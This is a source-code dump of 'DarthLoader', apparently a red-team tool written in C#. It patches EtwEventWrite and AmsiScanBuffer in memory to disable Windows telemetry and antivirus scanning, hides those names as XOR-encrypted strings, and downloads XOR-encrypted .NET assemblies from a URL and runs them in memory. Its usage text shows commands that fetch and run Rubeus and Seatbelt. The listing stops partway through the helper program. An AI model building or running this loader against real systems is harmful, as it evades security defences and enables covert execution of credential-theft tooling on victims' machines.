├── .gitignore
├── .vs
└── DarthLoader
│ └── v16
│ └── .suo
├── DarthLoader.sln
├── DarthLoader
├── App.config
├── DarthLoader.cs
├── DarthLoader.csproj
├── Helpers.cs
├── Properties
│ └── AssemblyInfo.cs
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs
│ ├── DarthLoader.csproj.AssemblyReference.cache
│ └── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Release
│ └── .NETFramework,Version=v4.6.AssemblyAttributes.cs
│ └── x64
│ └── Release
│ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs
│ ├── DarthLoader.csproj.AssemblyReference.cache
│ ├── DarthLoader.csproj.CoreCompileInputs.cache
│ ├── DarthLoader.csproj.FileListAbsolute.txt
│ ├── DarthLoader.exe
│ └── DarthLoader.pdb
├── DarthLoaderHelper
├── .vs
│ └── DarthLoaderHelper
│ │ └── v16
│ │ └── .suo
├── DarthLoaderHelper.sln
└── DarthLoaderHelper
│ ├── App.config
│ ├── DarthLoaderHelper.cs
│ ├── DarthLoaderHelper.csproj
│ ├── Properties
│ └── AssemblyInfo.cs
│ └── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs
│ ├── DarthLoaderHelper.csproj.AssemblyReference.cache
│ └── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Release
│ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs
│ └── DesignTimeResolveAssemblyReferencesInput.cache
│ └── x64
│ └── Release
│ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs
│ ├── DarthLoaderHelper.csproj.AssemblyReference.cache
│ ├── DarthLoaderHelper.csproj.CoreCompileInputs.cache
│ ├── DarthLoaderHelper.csproj.FileListAbsolute.txt
│ ├── DarthLoaderHelper.exe
│ ├── DarthLoaderHelper.pdb
│ └── DesignTimeResolveAssemblyReferencesInput.cache
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | # General
2 | .DS_Store
3 | .AppleDouble
4 | .LSOverride
5 |
6 | # Icon must end with two \r
7 | Icon
8 |
9 |
10 | # Thumbnails
11 | ._*
12 |
13 | # Files that might appear in the root of a volume
14 | .DocumentRevisions-V100
15 | .fseventsd
16 | .Spotlight-V100
17 | .TemporaryItems
18 | .Trashes
19 | .VolumeIcon.icns
20 | .com.apple.timemachine.donotpresent
21 |
22 | # Directories potentially created on remote AFP share
23 | .AppleDB
24 | .AppleDesktop
25 | Network Trash Folder
26 | Temporary Items
27 | .apdisk
28 | .obsidian
29 |
--------------------------------------------------------------------------------
/.vs/DarthLoader/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/.vs/DarthLoader/v16/.suo
--------------------------------------------------------------------------------
/DarthLoader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32630.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarthLoader", "DarthLoader\DarthLoader.csproj", "{58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|x64.ActiveCfg = Debug|x64
19 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|x64.Build.0 = Debug|x64
20 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|x64.ActiveCfg = Release|x64
23 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {9931390D-5E24-4481-9894-109E44E2DB67}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/DarthLoader/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DarthLoader/DarthLoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Threading;
4 | using System.Net;
5 |
6 | namespace DarthLoader
7 | {
8 | class DarthLoader
9 | {
10 | public static string FunctionsXorKey = "";
11 |
12 | static byte[] FetchRemoteAssembly(string url, string xorKey = "")
13 | {
14 | byte[] programBytes = null;
15 | ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
16 | WebClient webClient = new WebClient();
17 | int count = 2;
18 |
19 | while (count >= 0 && programBytes == null)
20 | {
21 | try
22 | {
23 | programBytes = Helpers.XorBytes(webClient.DownloadData(url), xorKey);
24 | }
25 | catch (WebException)
26 | {
27 | Console.WriteLine("[!] Assembly not found!");
28 | Console.WriteLine($"[+] Retrying download...");
29 | count--;
30 | Thread.Sleep(2000);
31 | }
32 | catch (NotSupportedException)
33 | {
34 | Console.WriteLine("[!] URL not valid. Check URL argument.");
35 | Environment.Exit(-1);
36 | }
37 | }
38 | return programBytes;
39 | }
40 |
41 | static void Main(string[] args)
42 | {
43 | string banner =
44 | @"
45 | _______ __ __ __ __
46 | | \ | \ | \ | \ | \
47 | | $$$$$$$\ ______ ______ _| $$_ | $$____ | $$ ______ ______ ____| $$ ______ ______
48 | | $$ | $$| \ / | $$ \ | $$ \| $$ / \ | \ / $$/ \ / \
49 | | $$ | $$ \$$$$$$| $$$$$$\$$$$$$ | $$$$$$$| $$ | $$$$$$\ \$$$$$$| $$$$$$| $$$$$$| $$$$$$\
50 | | $$ | $$/ $| $$ \$$| $$ __| $$ | $| $$ | $$ | $$/ $| $$ | $| $$ $| $$ \$$
51 | | $$__/ $| $$$$$$| $$ | $$| | $$ | $| $$____| $$__/ $| $$$$$$| $$__| $| $$$$$$$| $$
52 | | $$ $$\$$ $| $$ \$$ $| $$ | $| $$ \$$ $$\$$ $$\$$ $$\$$ | $$
53 | \$$$$$$$ \$$$$$$$\$$ \$$$$ \$$ \$$\$$$$$$$$\$$$$$$ \$$$$$$$ \$$$$$$$ \$$$$$$$\$$
54 | ";
55 |
56 | if (args.Length == 6)
57 | {
58 | if (args[0] == "--FunctionsXorKey" && args[2] == "--FilePath" && args[4] == "--Args")
59 | {
60 | FunctionsXorKey = args[1];
61 | string filePath = args[3];
62 | string assemblyArgs = args[5];
63 | Helpers.FirstHelperFunction();
64 | Helpers.SecondHelperFunction();
65 |
66 | if (!filePath.StartsWith("http"))
67 | {
68 | Console.WriteLine(banner);
69 | Console.WriteLine($"[+] Loading assembly from file path: {filePath}");
70 | Console.WriteLine("[+] Assembly loaded into memory... ");
71 | Console.WriteLine("[+] Hit any key to run...");
72 | Console.ReadKey();
73 | Helpers.ExecuteLocalFileArgs(filePath, assemblyArgs);
74 | }
75 | }
76 | else if (args[0] == "--FunctionsXorKey" && args[2] == "--FilePath" && args[4] == "--XorKey")
77 | {
78 | FunctionsXorKey = args[1];
79 | string filePath = args[3];
80 | string xorKey = args[5];
81 | Helpers.FirstHelperFunction();
82 | Helpers.SecondHelperFunction();
83 |
84 | if (filePath.StartsWith("http"))
85 | {
86 | Console.WriteLine(banner);
87 | Console.WriteLine($"[*] Downloading and encrypting assembly with the key: {xorKey}");
88 | byte[] assemblyBytes = FetchRemoteAssembly(filePath, xorKey);
89 | Console.WriteLine("[+] Encrypted assembly loaded into memory... ");
90 | Console.WriteLine("[+] Hit any key to run...");
91 | Console.ReadKey();
92 | Helpers.ExecuteRemoteAssembly(assemblyBytes, xorKey);
93 | }
94 | }
95 | }
96 | else if (args.Length == 4)
97 | {
98 | if (args[0] == "--FunctionsXorKey" && args[2] == "--FilePath")
99 | {
100 | FunctionsXorKey = args[1];
101 | string filePath = args[3];
102 | Helpers.FirstHelperFunction();
103 | Helpers.SecondHelperFunction();
104 |
105 | if (!filePath.StartsWith("http"))
106 | {
107 | Console.WriteLine(banner);
108 | Console.WriteLine($"[+] Loading assembly from file path: {filePath}");
109 | Console.WriteLine("[+] Assembly loaded into memory... ");
110 | Console.WriteLine("[+] Hit any key to run...");
111 | Console.ReadKey();
112 | Helpers.ExecuteLocalFile(filePath);
113 | }
114 | }
115 | }
116 | else if (args.Length == 8)
117 | {
118 | if ((args[0] == "--FunctionsXorKey" && args[2] == "--FilePath" && args[4] == "--Args" && args[6] == "--XorKey"))
119 | {
120 | FunctionsXorKey = args[1];
121 | string filePath = args[3];
122 | string assemblyArgs = args[5];
123 | string xorKey = args[7];
124 | Helpers.FirstHelperFunction();
125 | Helpers.SecondHelperFunction();
126 |
127 | if (filePath.StartsWith("http"))
128 | {
129 | Console.WriteLine(banner);
130 | Console.WriteLine($"[*] Downloading and encrypting assembly with the key: {xorKey}");
131 | byte[] assemblyBytes = FetchRemoteAssembly(filePath, xorKey);
132 | Console.WriteLine("[+] Encrypted assembly loaded into memory... ");
133 | Console.WriteLine("[+] Hit any key to run...");
134 | Console.ReadKey();
135 | Helpers.ExecuteRemoteAssemblyArgs(assemblyBytes, xorKey, assemblyArgs);
136 | }
137 | }
138 | }
139 | else
140 | {
141 | Console.WriteLine(banner);
142 | Console.WriteLine("==================== USAGE: ====================");
143 | Console.WriteLine("");
144 | Console.WriteLine("--FunctionsXorKey : Xor key to decrypt function strings from DarthLoaderHelper.exe");
145 | Console.WriteLine("--FilePath : a local file path or URL to load a .Net asseembly from");
146 | Console.WriteLine("--Args : Xor key to decrypt function strings from DarthLoaderHelper.exe");
147 | Console.WriteLine("--XorKey : Xor key used to encrypt/decrypt .Net assembly from URL");
148 | Console.WriteLine("");
149 | Console.WriteLine("==================== EXAMPLES: ====================");
150 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Seatbelt.exe --Args AntiVirus --XorKey test");
151 | Console.WriteLine("");
152 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Rubeus.exe --XorKey test");
153 | Console.WriteLine("");
154 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\devin\Desktop\Hello.exe");
155 | Console.WriteLine("");
156 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\devin\Desktop\Hello.exe --Args test");
157 | Console.WriteLine("");
158 | }
159 | }
160 | }
161 | }
162 |
--------------------------------------------------------------------------------
/DarthLoader/DarthLoader.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}
8 | Exe
9 | DarthLoader
10 | DarthLoader
11 | v4.6
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/DarthLoader/Helpers.cs:
--------------------------------------------------------------------------------
1 | // code copied from https://github.com/cobbr/SharpSploit/tree/master/SharpSploit/Evasion
2 |
3 | using System;
4 | using System.Text;
5 | using System.Runtime.InteropServices;
6 | using System.Reflection;
7 |
8 | namespace DarthLoader
9 | {
10 | class Helpers
11 | {
12 | private static string xorKey = DarthLoader.FunctionsXorKey;
13 |
14 | //etwbypass
15 | public static string etwBypassString = XorString(ConvertHex("11110416101E064241"), xorKey);
16 |
17 | // amsibypass
18 | public static string amsiBypassString = XorString(ConvertHex("1508001D0B1717504140"), xorKey);
19 |
20 | // ntdll.dll
21 | public static string ntDllString = XorString(ConvertHex("1A1117180540035D5E"), xorKey);
22 |
23 | // EtwEventWrite
24 | public static string etwEventWriteString = XorString(ConvertHex("311104311F0B094565411D1116"), xorKey);
25 |
26 | // amsi.dll
27 | public static string amsiDllString = XorString(ConvertHex("1508001D470A0B5D"), xorKey);
28 |
29 | // AmsiScanBuffer
30 | public static string amsiScanBufferString = XorString(ConvertHex("3508001D3A0D065F704612031606"), xorKey);
31 |
32 | [DllImport("kernel32")]
33 | static extern IntPtr GetProcAddress(
34 | IntPtr hModule,
35 | string procName);
36 |
37 | [DllImport("kernel32")]
38 | static extern IntPtr LoadLibrary(
39 | string name);
40 |
41 | [DllImport("kernel32")]
42 | static extern bool VirtualProtect(
43 | IntPtr lpAddress,
44 | UIntPtr dwSize,
45 | uint flNewProtect,
46 | out uint lpflOldProtect);
47 |
48 | static bool Is64Bit
49 | {
50 | get
51 | {
52 | return IntPtr.Size == 8;
53 | }
54 | }
55 |
56 | static byte[] Patch(string function)
57 | {
58 | byte[] patch;
59 | if (function.ToLower() == "firsthelperfunction")
60 | {
61 | if (Is64Bit)
62 | {
63 | patch = new byte[2];
64 | patch[0] = 0xc3;
65 | patch[1] = 0x00;
66 | }
67 | else
68 | {
69 | patch = new byte[3];
70 | patch[0] = 0xc2;
71 | patch[1] = 0x14;
72 | patch[2] = 0x00;
73 | }
74 | return patch;
75 | }
76 | else if (function.ToLower() == "secondhelperfunction")
77 | {
78 | if (Is64Bit)
79 | {
80 | patch = new byte[6];
81 | patch[0] = 0xB8;
82 | patch[1] = 0x57;
83 | patch[2] = 0x00;
84 | patch[3] = 0x07;
85 | patch[4] = 0x80;
86 | patch[5] = 0xC3;
87 | }
88 | else
89 | {
90 | patch = new byte[8];
91 | patch[0] = 0xB8;
92 | patch[1] = 0x57;
93 | patch[2] = 0x00;
94 | patch[3] = 0x07;
95 | patch[4] = 0x80;
96 | patch[5] = 0xC2;
97 | patch[6] = 0x18;
98 | patch[7] = 0x00;
99 |
100 | }
101 | return patch;
102 | }
103 | else throw new ArgumentException("[!] Error in function check!");
104 | }
105 |
106 | public static void FirstHelperFunction()
107 | {
108 | string traceloc = ntDllString;
109 | string magicFunction = etwEventWriteString;
110 | IntPtr ntdllAddr = LoadLibrary(traceloc);
111 | IntPtr traceAddr = GetProcAddress(ntdllAddr, magicFunction);
112 | byte[] magicVoodoo = Patch("FirstHelperFunction");
113 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect);
114 | Marshal.Copy(magicVoodoo, 0, traceAddr, magicVoodoo.Length);
115 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect);
116 | Console.WriteLine("[!] ETW bypassed!");
117 | }
118 | public static void SecondHelperFunction()
119 | {
120 | string avloc = amsiDllString;
121 | string magicFunction = amsiScanBufferString;
122 | IntPtr avAddr = LoadLibrary(avloc);
123 | IntPtr traceAddr = GetProcAddress(avAddr, magicFunction);
124 | byte[] magicVoodoo = Patch("SecondHelperFunction");
125 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect);
126 | Marshal.Copy(magicVoodoo, 0, traceAddr, magicVoodoo.Length);
127 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect);
128 | Console.WriteLine("[!] Amsi bypassed!");
129 | }
130 |
131 | public static byte[] XorBytes(byte[] inputByteArray, string keyString)
132 | {
133 | byte[] key = Encoding.UTF8.GetBytes(keyString);
134 | byte[] data = new byte[inputByteArray.Length];
135 |
136 | for (int i = 0; i < inputByteArray.Length; i++)
137 | {
138 | data[i] = (byte)(inputByteArray[i] ^ key[i % key.Length]);
139 | }
140 | return data;
141 | }
142 |
143 | public static string XorString(string stringInput, string key)
144 | {
145 | StringBuilder sb = new StringBuilder();
146 | for (int i = 0; i < stringInput.Length; i++)
147 | {
148 | sb.Append((char)(stringInput[i] ^ key[(i % key.Length)]));
149 | }
150 | String result = sb.ToString();
151 | return result;
152 | }
153 |
154 | public static string ConvertHex(String hexString)
155 | {
156 | try
157 | {
158 | string ascii = string.Empty;
159 |
160 | for (int i = 0; i < hexString.Length; i += 2)
161 | {
162 | String hs = string.Empty;
163 | hs = hexString.Substring(i, 2);
164 | uint decval = System.Convert.ToUInt32(hs, 16);
165 | char character = System.Convert.ToChar(decval);
166 | ascii += character;
167 |
168 | }
169 | return ascii;
170 | }
171 | catch
172 | {
173 | Console.WriteLine("[!] Error converting hex to string!");
174 | }
175 | return string.Empty;
176 | }
177 |
178 | public static void ExecuteLocalFileArgs(string FilePath, string args)
179 | {
180 | Assembly dotNetProgram = Assembly.LoadFile(FilePath);
181 | string[] assArgs = new string[] { args };
182 | dotNetProgram.EntryPoint.Invoke(null, new object[] { assArgs });
183 | }
184 |
185 | public static void ExecuteLocalFile(string FilePath)
186 | {
187 | Assembly dotNetProgram = Assembly.LoadFile(FilePath);
188 | dotNetProgram.EntryPoint.Invoke(null, new object[] { null });
189 | }
190 |
191 | public static void ExecuteRemoteAssemblyArgs(byte[] programBytes, string xorKey, string args)
192 | {
193 | try
194 | {
195 | Assembly dotNetProgram = Assembly.Load(XorBytes(programBytes, xorKey));
196 | string[] assArgs = new string[] { args };
197 | dotNetProgram.EntryPoint.Invoke(null, new object[] { assArgs });
198 | }
199 | catch (TargetInvocationException)
200 | {
201 | Console.WriteLine("[!] Missing arguments for loaded assembly!");
202 | Environment.Exit(-1);
203 | }
204 | }
205 |
206 | public static void ExecuteRemoteAssembly(byte[] programBytes, string xorKey)
207 | {
208 | try
209 | {
210 | Assembly dotNetProgram = Assembly.Load(XorBytes(programBytes, xorKey));
211 | dotNetProgram.EntryPoint.Invoke(null, new object[] { null });
212 | }
213 | catch (TargetInvocationException)
214 | {
215 | Console.WriteLine("[!] Missing arguments for loaded assembly!");
216 | Environment.Exit(-1);
217 | }
218 | }
219 | }
220 | }
221 |
--------------------------------------------------------------------------------
/DarthLoader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DarthLoader")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DarthLoader")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("58b2282c-ae7f-4c6a-99b9-7bf3c1ffd7a7")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/DarthLoader/obj/Debug/.NETFramework,Version=v4.6.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
5 |
--------------------------------------------------------------------------------
/DarthLoader/obj/Debug/DarthLoader.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/Debug/DarthLoader.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/DarthLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/DarthLoader/obj/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
5 |
--------------------------------------------------------------------------------
/DarthLoader/obj/x64/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
5 |
--------------------------------------------------------------------------------
/DarthLoader/obj/x64/Release/DarthLoader.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC������
--------------------------------------------------------------------------------
/DarthLoader/obj/x64/Release/DarthLoader.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 8e7733187352e449bebc69a99c12cb1f4b71364e
2 |
--------------------------------------------------------------------------------
/DarthLoader/obj/x64/Release/DarthLoader.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release\DarthLoader.exe.config
2 | D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release\DarthLoader.exe
3 | D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release\DarthLoader.pdb
4 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.csproj.CoreCompileInputs.cache
5 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.exe
6 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.pdb
7 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.csproj.AssemblyReference.cache
8 |
--------------------------------------------------------------------------------
/DarthLoader/obj/x64/Release/DarthLoader.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/x64/Release/DarthLoader.exe
--------------------------------------------------------------------------------
/DarthLoader/obj/x64/Release/DarthLoader.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/x64/Release/DarthLoader.pdb
--------------------------------------------------------------------------------
/DarthLoaderHelper/.vs/DarthLoaderHelper/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/.vs/DarthLoaderHelper/v16/.suo
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32630.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarthLoaderHelper", "DarthLoaderHelper\DarthLoaderHelper.csproj", "{4512803D-EE69-4DE9-9D47-56F1909C6049}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|x64.ActiveCfg = Debug|x64
19 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|x64.Build.0 = Debug|x64
20 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|x64.ActiveCfg = Release|x64
23 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {B9D48E68-2FB2-4DB2-AABC-ED834CB109AF}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DarthLoaderHelper/DarthLoaderHelper/DarthLoaderHelper.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace DarthLoaderHelper
5 | {
6 | class DarthLoaderHelper
7 | {
8 | public static string xorKey = "";
9 |
10 | public static string XorString(string stringInput, string key)
11 | {
12 | StringBuilder sb = new StringBuilder();
13 | for (int i = 0; i < stringInput.Length; i++)
14 | sb.Append((char)(stringInput[i] ^ key[(i % key.Length)]));
15 | String result = sb.ToString();
16 | return result;
17 | }
18 | public static string Base64Encode(string plainText)
19 | {
20 | var plainTextBytes = Encoding.UTF8.GetBytes(plainText);
21 | return Convert.ToBase64String(plainTextBytes);
22 | }
23 |
24 | public static byte[] XorBytes(byte[] inputByteArray, string keyString)
25 | {
26 | byte[] key = Encoding.UTF8.GetBytes(keyString);
27 | byte[] data = new byte[inputByteArray.Length];
28 |
29 | for (int i = 0; i < inputByteArray.Length; i++)
30 | {
31 | data[i] = (byte)(inputByteArray[i] ^ key[i % key.Length]);
32 | }
33 | return data;
34 | }
35 |
36 | public static string ConvertStringToBytes(string input)
37 | {
38 | byte[] bytes = Encoding.Default.GetBytes(input);
39 | byte[] xoredBytes = XorBytes(bytes, xorKey);
40 | return BitConverter.ToString(xoredBytes).Replace("-", "");
41 | }
42 |
43 | public static string ConvertHex(String hexString)
44 | {
45 | try
46 | {
47 | string ascii = string.Empty;
48 |
49 | for (int i = 0; i < hexString.Length; i += 2)
50 | {
51 | String hs = string.Empty;
52 |
53 | hs = hexString.Substring(i, 2);
54 | uint decval = Convert.ToUInt32(hs, 16);
55 | char character = Convert.ToChar(decval);
56 | ascii += character;
57 | }
58 | return ascii;
59 | }
60 | catch (Exception ex) { Console.WriteLine(ex.Message); }
61 | return string.Empty;
62 | }
63 |
64 | static void Main(string[] args)
65 | {
66 | try
67 | {
68 | xorKey = args[0];
69 |
70 | // strings to encrypt
71 | string etwBypass = "etwbypass";
72 | string amsi = "amsibypass";
73 | string ntdDll = "ntdll.dll";
74 | string etw = "EtwEventWrite";
75 | string amsiDll = "amsi.dll";
76 | string amsiBuffer = "AmsiScanBuffer";
77 |
78 | Console.WriteLine($"[+] Encrypting with key: {xorKey}");
79 | Console.WriteLine($"[+] Encrypted string 'etwbypass': {ConvertStringToBytes(etwBypass)}");
80 | Console.WriteLine($"[+] Encrypted string 'amsibypass': {ConvertStringToBytes(amsi)}");
81 | Console.WriteLine($"[+] Encrypted string 'ntdll.dll': {ConvertStringToBytes(ntdDll)}");
82 | Console.WriteLine($"[+] Encrypted string 'EtwEventWrite': {ConvertStringToBytes(etw)}");
83 | Console.WriteLine($"[+] Encrypted string 'amsi.dll': {ConvertStringToBytes(amsiDll)}");
84 | Console.WriteLine($"[+] Encrypted string 'AmsiScanBuffer': {ConvertStringToBytes(amsiBuffer)}");
85 |
86 | // Converting back
87 | //string hexASCIIVar = ConvertHex(encryptedPayload);
88 | //Console.WriteLine($"[+] Hex to ASCII value var: {hexASCIIVar}");
89 | //string decrytedPayload = XorString(hexASCIIVar, xorKey);
